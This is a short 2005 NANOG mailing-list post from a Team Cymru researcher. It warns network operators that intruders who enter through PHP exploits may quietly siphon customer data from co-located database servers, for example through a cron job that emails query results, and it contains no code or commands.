Destructive botnet originating from Japan (fwd)

Rob Thomas robt at cymru.com
Sat Dec 24 21:03:27 UTC 2005


Hi again, NANOGers.  :)

I shouldn't have focused solely on the bot issue, sorry.  When
miscreants obtain access to a server through some PHP exploit, they
generally take a look around.  If the web server is also a database
server (eek!), then the real fun begins.  There won't be a noisome
bot placed on that server, oh no.  One crew installed a cron script
to run a SQL query for the new customer data collected in the past
24 hours, then email the query results to the miscreants.  :(

DDoS can be very painful, and it has the side benefit of being very
overt.  It is the more subtle attacks and abuses that might concern
you even more.  It is generally the case that the tools and
techniques for both are the same.

Thanks,
Rob.
-- 
Rob Thomas
Team Cymru
http://www.cymru.com/
ASSERT(coffee != empty);




More information about the NANOG mailing list